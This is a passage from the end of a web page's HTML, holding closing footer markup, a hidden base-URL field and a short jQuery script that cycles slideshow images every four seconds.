    </nav>
</footer>
<input id="base_url" type="hidden" value="/">

<script type="text/javascript">
    $(function() {
        var imgs = $("#slideshow > li");
        var imgLen = imgs.length;
        var count = 0;
        function changeImg() {
            count = (count + 1) % imgLen;
            imgs.removeClass("showSlide").eq(count).addClass("showSlide");
        }
        setInterval(changeImg, 4000);
    })
</script>
</html>